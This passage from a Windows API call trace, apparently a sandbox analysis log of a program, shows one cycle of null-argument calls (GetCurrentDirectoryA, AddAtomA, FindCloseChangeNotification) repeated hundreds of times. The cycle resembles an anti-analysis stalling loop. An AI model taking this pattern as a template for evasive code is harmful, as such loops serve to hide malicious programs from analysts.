lpBuffer="Module32FirstW") returned 0x26 [0129.444] AddAtomA (lpString=0x0) returned 0x0 [0129.444] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.444] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.444] AddAtomA (lpString=0x0) returned 0x0 [0129.444] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.444] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.444] AddAtomA (lpString=0x0) returned 0x0 [0129.444] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.444] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.444] AddAtomA (lpString=0x0) returned 0x0 [0129.444] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.444] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.444] AddAtomA (lpString=0x0) returned 0x0 [0129.444] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.444] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.444] AddAtomA (lpString=0x0) returned 0x0 [0129.444] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.444] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.445] AddAtomA (lpString=0x0) returned 0x0 [0129.445] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.445] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.445] AddAtomA (lpString=0x0) returned 0x0 [0129.445] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.445] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.445] AddAtomA (lpString=0x0) returned 0x0 [0129.445] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.445] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.445] AddAtomA (lpString=0x0) returned 0x0 [0129.445] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.445] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.445] AddAtomA (lpString=0x0) returned 0x0 [0129.445] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.445] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.445] AddAtomA (lpString=0x0) returned 0x0 [0129.445] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.445] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.445] AddAtomA (lpString=0x0) returned 0x0 [0129.445] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.445] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.445] AddAtomA (lpString=0x0) returned 0x0 [0129.445] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.446] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.446] AddAtomA (lpString=0x0) returned 0x0 [0129.446] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.446] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.446] AddAtomA (lpString=0x0) returned 0x0 [0129.446] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.446] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.446] AddAtomA (lpString=0x0) returned 0x0 [0129.446] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.446] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.446] AddAtomA (lpString=0x0) returned 0x0 [0129.446] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.446] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.446] AddAtomA (lpString=0x0) returned 0x0 [0129.446] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.446] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.446] AddAtomA (lpString=0x0) returned 0x0 [0129.446] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.446] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.446] AddAtomA (lpString=0x0) returned 0x0 [0129.446] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.446] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.446] AddAtomA (lpString=0x0) returned 0x0 [0129.446] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.447] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.447] AddAtomA (lpString=0x0) returned 0x0 [0129.447] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.447] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.447] AddAtomA (lpString=0x0) returned 0x0 [0129.447] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.447] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.447] AddAtomA (lpString=0x0) returned 0x0 [0129.447] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.447] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.447] AddAtomA (lpString=0x0) returned 0x0 [0129.447] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.447] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.447] AddAtomA (lpString=0x0) returned 0x0 [0129.447] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.447] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.447] AddAtomA (lpString=0x0) returned 0x0 [0129.447] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.447] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.447] AddAtomA (lpString=0x0) returned 0x0 [0129.447] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.447] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.447] AddAtomA (lpString=0x0) returned 0x0 [0129.447] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.448] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.448] AddAtomA (lpString=0x0) returned 0x0 [0129.448] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.448] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.448] AddAtomA (lpString=0x0) returned 0x0 [0129.448] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.448] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.448] AddAtomA (lpString=0x0) returned 0x0 [0129.448] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.448] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.448] AddAtomA (lpString=0x0) returned 0x0 [0129.448] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.448] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.448] AddAtomA (lpString=0x0) returned 0x0 [0129.448] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.448] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.448] AddAtomA (lpString=0x0) returned 0x0 [0129.448] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.448] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.448] AddAtomA (lpString=0x0) returned 0x0 [0129.448] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.448] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.448] AddAtomA (lpString=0x0) returned 0x0 [0129.448] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.449] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.449] AddAtomA (lpString=0x0) returned 0x0 [0129.449] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.449] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.449] AddAtomA (lpString=0x0) returned 0x0 [0129.449] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.449] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.449] AddAtomA (lpString=0x0) returned 0x0 [0129.449] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.449] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.449] AddAtomA (lpString=0x0) returned 0x0 [0129.449] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.449] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.449] AddAtomA (lpString=0x0) returned 0x0 [0129.449] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.449] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.449] AddAtomA (lpString=0x0) returned 0x0 [0129.449] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.449] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.449] AddAtomA (lpString=0x0) returned 0x0 [0129.449] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.449] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.449] AddAtomA (lpString=0x0) returned 0x0 [0129.449] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.449] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.450] AddAtomA (lpString=0x0) returned 0x0 [0129.450] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.450] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.450] AddAtomA (lpString=0x0) returned 0x0 [0129.450] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.450] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.450] AddAtomA (lpString=0x0) returned 0x0 [0129.450] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.450] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.450] AddAtomA (lpString=0x0) returned 0x0 [0129.450] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.450] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.450] AddAtomA (lpString=0x0) returned 0x0 [0129.450] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.450] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.450] AddAtomA (lpString=0x0) returned 0x0 [0129.450] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.450] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.450] AddAtomA (lpString=0x0) returned 0x0 [0129.450] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.450] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.450] AddAtomA (lpString=0x0) returned 0x0 [0129.450] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.450] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.451] AddAtomA (lpString=0x0) returned 0x0 [0129.451] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.451] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.451] AddAtomA (lpString=0x0) returned 0x0 [0129.451] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.451] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.451] AddAtomA (lpString=0x0) returned 0x0 [0129.451] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.451] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.451] AddAtomA (lpString=0x0) returned 0x0 [0129.451] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.451] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.451] AddAtomA (lpString=0x0) returned 0x0 [0129.451] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.451] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.451] AddAtomA (lpString=0x0) returned 0x0 [0129.451] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.451] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.451] AddAtomA (lpString=0x0) returned 0x0 [0129.451] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.451] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.451] AddAtomA (lpString=0x0) returned 0x0 [0129.451] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.451] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.452] AddAtomA (lpString=0x0) returned 0x0 [0129.452] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.452] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.452] AddAtomA (lpString=0x0) returned 0x0 [0129.452] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.452] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.452] AddAtomA (lpString=0x0) returned 0x0 [0129.452] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.452] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.452] AddAtomA (lpString=0x0) returned 0x0 [0129.452] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.452] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.452] AddAtomA (lpString=0x0) returned 0x0 [0129.452] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.452] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.452] AddAtomA (lpString=0x0) returned 0x0 [0129.452] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.452] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.452] AddAtomA (lpString=0x0) returned 0x0 [0129.452] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.500] AddAtomA (lpString=0x0) returned 0x0 [0129.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.500] AddAtomA (lpString=0x0) returned 0x0 [0129.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.500] AddAtomA (lpString=0x0) returned 0x0 [0129.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.500] AddAtomA (lpString=0x0) returned 0x0 [0129.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.500] AddAtomA (lpString=0x0) returned 0x0 [0129.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.500] AddAtomA (lpString=0x0) returned 0x0 [0129.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.500] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.500] AddAtomA (lpString=0x0) returned 0x0 [0129.500] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.501] AddAtomA (lpString=0x0) returned 0x0 [0129.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.501] AddAtomA (lpString=0x0) returned 0x0 [0129.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.501] AddAtomA (lpString=0x0) returned 0x0 [0129.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.501] AddAtomA (lpString=0x0) returned 0x0 [0129.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.501] AddAtomA (lpString=0x0) returned 0x0 [0129.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.501] AddAtomA (lpString=0x0) returned 0x0 [0129.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.501] AddAtomA (lpString=0x0) returned 0x0 [0129.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.501] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.501] AddAtomA (lpString=0x0) returned 0x0 [0129.501] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.502] AddAtomA (lpString=0x0) returned 0x0 [0129.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.502] AddAtomA (lpString=0x0) returned 0x0 [0129.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.502] AddAtomA (lpString=0x0) returned 0x0 [0129.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.502] AddAtomA (lpString=0x0) returned 0x0 [0129.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.502] AddAtomA (lpString=0x0) returned 0x0 [0129.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.502] AddAtomA (lpString=0x0) returned 0x0 [0129.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.502] AddAtomA (lpString=0x0) returned 0x0 [0129.502] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.502] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.502] AddAtomA (lpString=0x0) returned 0x0 [0129.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.503] AddAtomA (lpString=0x0) returned 0x0 [0129.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.503] AddAtomA (lpString=0x0) returned 0x0 [0129.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.503] AddAtomA (lpString=0x0) returned 0x0 [0129.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.503] AddAtomA (lpString=0x0) returned 0x0 [0129.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.503] AddAtomA (lpString=0x0) returned 0x0 [0129.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.503] AddAtomA (lpString=0x0) returned 0x0 [0129.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.503] AddAtomA (lpString=0x0) returned 0x0 [0129.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.503] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.503] AddAtomA (lpString=0x0) returned 0x0 [0129.503] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.504] AddAtomA (lpString=0x0) returned 0x0 [0129.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.504] AddAtomA (lpString=0x0) returned 0x0 [0129.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.504] AddAtomA (lpString=0x0) returned 0x0 [0129.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.504] AddAtomA (lpString=0x0) returned 0x0 [0129.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.504] AddAtomA (lpString=0x0) returned 0x0 [0129.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.504] AddAtomA (lpString=0x0) returned 0x0 [0129.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.504] AddAtomA (lpString=0x0) returned 0x0 [0129.504] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.504] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.504] AddAtomA (lpString=0x0) returned 0x0 [0129.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.505] AddAtomA (lpString=0x0) returned 0x0 [0129.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.505] AddAtomA (lpString=0x0) returned 0x0 [0129.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.505] AddAtomA (lpString=0x0) returned 0x0 [0129.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.505] AddAtomA (lpString=0x0) returned 0x0 [0129.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.505] GetCurrentDirectoryA (in: nBufferLength=0x0, 